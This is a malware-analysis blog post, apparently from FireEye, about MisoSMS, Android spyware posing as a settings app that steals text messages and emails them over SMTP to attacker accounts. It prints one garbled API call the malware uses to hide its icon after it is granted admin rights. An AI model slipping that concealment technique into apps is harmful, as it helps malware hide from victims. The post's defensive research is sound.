FireEye has uncovered and helped weaken one of the largest advanced
mobile botnets to date. The botnet, which we are dubbing “MisoSMS,” has
been used in at least 64 spyware campaigns, stealing text messages and
emailing them to cybercriminals in China.
MisoSMS infects Android systems by deploying a class of malicious
Android apps. The mobile malware masquerades as an Android settings app
used for administrative tasks. When executed, it secretly steals the
user’s personal SMS messages and emails them to a command-and-control
(CnC) infrastructure hosted in China. FireEye Mobile Threat Prevention
platform detects this class of malware as “Android.Spyware.MisoSMS.”
Here are some highlights of MisoSMS:
- We discovered 64 mobile botnet campaigns that belong to the MisoSMS malware family.
- Each of the campaigns leverage Web mail as its (CnC) infrastructure.
- The CnC infrastructure comprises more than 450 unique malicious email accounts.
- FireEye has been working with the community to take down the CnC infrastructure.
- The majority of the devices infected are in Korea, which leads us to
believe that this threat is active and prevalent in that region.
- The attackers logged in from Korea and mainland China, among other locations, to periodically read the stolen SMS messages.
MisoSMS is active and widespread in Korea, and we are working with
Korean law enforcement and the Chinese Web mail vendor to mitigate this
threat. This threat highlights the need for greater cross-country and
cross-organizational efforts to take down large malicious campaigns.
At the time of of this blog post, all of the reported malicious email
accounts have been deactivated and we have not noticed any new email
addresses getting registered by the attacker. FireEye Labs will closely
monitor this threat and continue working with relevant authorities to
mitigate it.
Technical Analysis
Once the app is installed, it presents itself as “Google Vx.” It asks
for administrative permissions on the device, which enables the malware
to hide itself from the user, as shown in Figure 2.
Once the user grants administrator privileges to the app, the app
shows the message in Figure 3, which translates to “The file is damaged
and can’t use. Please check it on the website”” and an OK button. Then is asks the user to confirm deletion, ostensibly offering the option to Confirm or Cancel. If the user taps Confirm, the app sleeps for 800 milliseconds then displays a message that says “Remove Complete.” If the users taps Cancel, the app still displays the “Remove Complete” message.
In either case, the following API call is made to hide the app from the user.
12MainActivity.this.getPackageManager().setComponentEnabledSetting
MainActivity.this.getComponentName(), 2, 1);
This application exfiltrates the SMS messages in a unique way. Some
SMS-stealing malware sends the contents of users SMS messages by
forwarding the messages over SMS to phone numbers under the attacker’s
control. Others send the stolen SMS messages to a CnC server over TCP
connections. This malicious app, by contrast, sends the stolen SMS
messages to the attacker’s email address over an SMTP connection. A
South Korean company described a similar SMTP-based exfiltration
technique in its blog. Most of the MisoSMS-based apps we discovered had no or very few vendor detections on VirusTotal. Visit http://www.fireeye.com/blog/technical/botnet-activities-research/2013/12/misosms.html to read more.